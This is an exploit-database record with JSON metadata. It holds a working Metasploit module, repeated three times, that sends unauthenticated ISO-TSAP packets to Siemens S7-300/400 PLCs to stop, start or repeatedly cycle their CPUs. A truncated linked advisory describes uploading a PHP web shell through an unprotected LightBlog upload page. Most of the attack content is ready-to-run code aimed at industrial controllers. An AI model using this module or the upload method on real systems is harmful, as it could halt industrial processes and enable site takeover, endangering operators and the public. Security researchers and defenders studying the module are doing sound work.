ID 1337DAY-ID-18989 Type zdt Reporter Dillon Beresford Modified 2012-07-13T00:00:00
Description
Exploit for hardware platform in category remote exploits
# Exploit Title: Siemens Simatic S7 300/400 CPU command module
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-300 PLC
# CVE : None
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Rex::Socket::Tcp
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',
'Description' => %q{
The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP
this modules allows an attacker to perform administrative commands without authentication.
This module allows a remote user to change the state of the PLC between
STOP and START, allowing an attacker to end process control by the PLC.
},
'Author' => 'Dillon Beresford',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],
],
'Version' => '$Revision$',
'DisclosureDate' => 'May 09 2011'
))
register_options(
[
Opt::RPORT(102),
OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),
OptInt.new('CYCLES',[true,"Set the amount of CPU STOP/RUN cycles.",10])
], self.class)
end
def run_host(ip)
begin
cpu = datastore['MODE'] || ''
cycles = datastore['CYCLES'] || ''
stop_cpu_pkt =
[
"\x03\x00\x00\x16\x11\xe0\x00\x00"+
"\x00\x01\x00\xc1\x02\x01\x00\xc2"+
"\x02\x01\x02\xc0\x01\x09",
"\x03\x00\x00\x19\x02\xf0\x80\x32"+
"\x01\x00\x00\xff\xff\x00\x08\x00"+
"\x00\xf0\x00\x00\x01\x00\x01\x03"+
"\xc0",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x00\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x40\x00\x01\x84\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x21\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x02\x00\x10\x00"+
"\x00\x29\x00\x00\x00\x00\x00\x09"+
"\x50\x5f\x50\x52\x4f\x47\x52\x41"+
"\x4d",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00"
]
start_cpu_pkt =
[
"\x03\x00\x00\x16\x11\xe0\x00\x00"+
"\x00\x01\x00\xc1\x02\x01\x00\xc2"+
"\x02\x01\x02\xc0\x01\x09",
"\x03\x00\x00\x19\x02\xf0\x80\x32"+
"\x01\x00\x00\xff\xff\x00\x08\x00"+
"\x00\xf0\x00\x00\x01\x00\x01\x03"+
"\xc0",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x00\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x40\x00\x01\x84\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x25\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x02\x00\x14\x00"+
"\x00\x28\x00\x00\x00\x00\x00\x00"+
"\xfd\x00\x00\x09\x50\x5f\x50\x52"+
"\x4f\x47\x52\x41\x4d"
]
# CPU STOP
if(cpu == 1)
connect()
stop_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
# CPU START
if(cpu == 2)
connect()
start_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
# STOP / START CPU
for n in 0..cycles
if(cpu == 3)
connect()
# We assume PLC is up and running (issue a stop command)
stop_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
connect()
# We assume PLC is has been stopped (issue a start command)
start_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
end
data = sock.get_once()
print_good("#{ip} PLC is running, iso-tsap port is open.")
if(cpu == 'true')
print_status("Putting the PLC into START mode.")
elsif(cpu == 'false')
print_status("Putting the PLC into STOP mode.")
end
disconnect()
rescue ::EOFError
end
end
end
# 0day.today [2018-01-05] #
{"hash": "c566b0fb60b1b0d39f19f6a96f0516e8ecdbee4792e40d0950aa6e1428a3f19f", "id": "1337DAY-ID-18989", "lastseen": "2018-01-05T09:10:10", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "f3c1cf74a97f78a6e4417c3373968c0f", "key": "href"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}, {"hash": "b7bb7c0db1a30cdbce2068cbfa35c3cd", "key": "sourceData"}, {"hash": "79d73b790c2289af856b8c9f7b776f13", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-05T09:10:10"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18989"]}], "modified": "2018-01-05T09:10:10"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "history": [{"bulletin": {"hash": "0fb071f36986db0374cd7ef7b5afb1e1f9251f3bf7249c774f2886b1c96c812e", "id": "1337DAY-ID-18989", "lastseen": "2016-04-20T01:30:06", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-20T01:30:06"}}, "hashmap": [{"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c94494b59125874daeb640d4f018b22a", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "e009ae992c1321e1e1fc17f8b6d1e9be", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d3d589959b43cf4502d9563444e0e806", "key": "sourceData"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "viewCount": 2, "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": "http://0day.today/exploit/description/18989"}, "lastseen": "2016-04-20T01:30:06", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": "https://0day.today/exploit/description/18989"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": " LightBlog 9.5 - REMOTE FILE UPLOAD VULNERABILITY\r\nby Omni\r\n1) Infos\r\n---------\r\nDate : 2008-01-30\r\nProduct : LightBlog\r\nVersion : v 9.5\r\nVendor : http://www.publicwarehouse.co.uk/\r\nVendor Status :\r\n2008-01-31 Informed!\r\n2008-01-31 Patch received from vendor!\r\n2008-02-01 Published!\r\n\r\n\r\nDescription : Lightblog provides webmasters who don't have SQL databases with a fully featured blogging system. Using\r\ntext files to store data, there's no need for complicated installation procedures or a potentially pricey\r\nhosting bill.\r\nDork : "Powered by LightBlog" - Powered by LightBlog\r\nSource : omnipresent - omni - http://omni.netsons.org\r\n\r\nE-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]\r\nTeam : Playhack.net Security\r\n\r\n\r\n2) Security Issues\r\n-------------------\r\n\r\n\r\n--- [ Remote File Upload Vulnerability ] ---\r\n===============================================\r\nA remote file upload vulnerability is present in LightBlog version 9.5.\r\nUsers without permissions are able to upload any kind of files, also .php; so the attacker can upload their own remote PHP\r\nshell.\r\nThe file vulnerable is: cp_upload_image.php, and you can find it under the root directory of the blog uploaded. (shown\r\nin the section PoC).\r\n\r\n\r\n--- [ PoC ] ---\r\n===============\r\nhttp://localhost/light/cp_upload_image.php\r\nJust look for your PHP shell, upload it (shell.php) and then use it:\r\nhttp://localhost/light/images/shell.php\r\n\r\n\r\n--- [ Patch ] ---\r\n===============\r\n- Edit the source code.\r\n- use CHMOD\r\n- Delete cp_upload_image.php\r\n- Use the vendor patch.", "modified": "2008-02-01T00:00:00", "published": "2008-02-01T00:00:00", "id": "SECURITYVULNS:DOC:18989", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18989", "title": "LightBlog Remote File Upload Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-01T00:00:00", "published": 